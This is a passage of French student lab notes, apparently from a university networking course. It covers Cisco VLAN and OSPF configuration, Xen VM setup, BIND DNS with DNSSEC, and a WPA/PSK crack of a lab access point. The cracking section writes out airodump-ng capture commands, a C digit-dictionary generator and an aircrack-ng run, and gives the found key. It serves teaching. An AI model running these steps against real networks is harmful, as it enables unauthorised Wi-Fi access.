  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
